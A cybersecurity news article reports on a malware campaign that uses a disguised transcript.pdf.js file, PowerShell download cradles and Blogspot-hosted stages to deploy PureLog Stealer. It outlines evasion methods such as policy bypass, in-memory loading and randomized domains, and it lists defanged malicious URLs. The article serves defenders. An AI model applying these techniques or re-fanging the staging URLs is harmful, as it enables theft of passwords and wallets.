Hackers Abuse Blogspot and PowerShell Download Cradles to Deploy PureLog Steale

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

Spread the love

Hackers have found a clever way to sneak data-stealing malware onto victims’ computers by hiding their tracks inside a trusted platform, Google Blogspot.

Researchers recently uncovered a campaign abusing this blogging service alongside native Windows tools to quietly install an information stealer known as PureLog Stealer.

The attack begins with something deceptively simple. A file named transcript.pdf.js looks like an ordinary PDF at first glance, but Windows treats it very differently behind the scenes.

Since Windows often hides file extensions by default, victims see only transcript.pdf and have little reason to suspect anything is wrong.

Once opened, the file runs through Windows Script Host and immediately launches PowerShell with security checks turned off.

From there, PowerShell reaches out to attacker-controlled Blogspot pages to fetch the next stages, without saving a suspicious file to disk.

Researchers from Securonix said in a report shared with Cyber Security News (CSN) that they identified and documented this framework, naming it Veil#Drop for how it conceals activity behind layers of encoding and legitimate looking web traffic.

Hidden file extension masking transcript.pdf.js as a PDF in Windows Explorer (Source – Securonix)

Their analysis traced the chain from the first click to the final theft of browser passwords and cryptocurrency wallet data.

The campaign stands out because each step looks so ordinary. PowerShell commands, Blogspot visits, and trusted Microsoft utilities are things security teams see every day, which is why this approach slips past antivirus tools so easily.

The trick starts with a compromised website hosting the fake document file. Once a victim double clicks transcript.pdf.js, Windows Script Host quietly hands control to PowerShell, forcing a connection with execution policy checks bypassed entirely.

PowerShell then uses a download cradle, fetching code directly from a Blogspot page and running it from memory. Nothing is written to the hard drive at this stage, so many file scanning tools never inspect it.

PowerShell execution policy bypass scoped to the current process (Source – Securonix)

The retrieved file, named phud.dudus.docx.pdf.olp.sys, deletes the original JavaScript launcher to erase evidence and shuts down background processes that might interfere later. It also decrypts a hidden payload using a repeating XOR key.

That decrypted script builds a new Blogspot web address on the fly, adding random characters so each infection looks different. This makes it harder for defenders to block the campaign using a fixed list of bad domains.

The newly fetched file, niple.docx.odp.pdf.sys, carries two large blocks of encoded numeric data. These decode into working dot NET programs, loaded directly into memory using reflection, meaning no executable ever touches the disk.

If that approach fails, the malware falls back on trusted Microsoft signed tools such as InstallUtil, MSBuild, RegSvcs, and the C sharp compiler, blending in with activity that security software usually ignores.

What PureLog Stealer Does Next

Once active, PureLog Stealer harvests whatever valuable data it can find, including saved browser passwords, cookies, autofill entries, browsing history, and cryptocurrency wallet details.

The stealer also gathers information about the infected system, giving attackers a clearer picture of what they compromised. This happens quietly, often without any visible sign that something is wrong.

Because the chain runs from memory and avoids writing files, standard antivirus scans can easily miss it. Security teams are better served watching behavior, such as PowerShell reaching out to Blogspot or spawning tools it would not normally touch.

The embedded XOR-encoded payload and its runtime decryption routine (Source – Securonix)

Researchers recommend restricting which scripts Windows Script Host can run, especially where it serves no real business purpose. Turning on PowerShell logging and watching for policy bypass attempts can catch this activity early.

Monitoring outbound connections to trusted cloud platforms for unusual patterns, rather than relying purely on domain reputation, gives defenders a better chance of spotting this abuse. Application control and least privilege further reduce the odds fallback techniques succeed.

This framework shows a deliberate effort to slip past antivirus products and detection systems throughout the attack.

Awareness remains one of the strongest defenses given how ordinary each step looks alone. Employees should stay cautious about unexpected downloads bearing unusual double extensions like those seen throughout this campaign.

Indicators of Compromise (IoCs):-

Type Indicator Description
Filename transcript.pdf.js Initial JavaScript launcher disguised as a PDF document 
Filename phud.dudus.docx.pdf.olp.sys Second-stage PowerShell loader retrieved from Blogspot 
Filename niple.docx.odp.pdf.sys Third-stage loader containing encoded PureLog Stealer assemblies 
Domain htlwub00klocate[.]blogspot[.]com Blogspot domain used to stage the second-stage payload 
Domain cpyzaramay26[.]blogspot[.]com Blogspot domain used to stage the third-stage payload 
URL hxxps://htlwub00klocate[.]blogspot[.]com/phud.dudus.docx.pdf.olp.sys URL delivering the second-stage PowerShell loader 
URL hxxps://cpyzaramay26[.]blogspot[.]com/niple.docx.odp.pdf.sys URL delivering the final-stage loader for PureLog Stealer 

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

 Strengthen Your SOC by Accelerating Threat Detection & Rapid Investigations. -> Integrate ANY.RUN With Your SOC Now.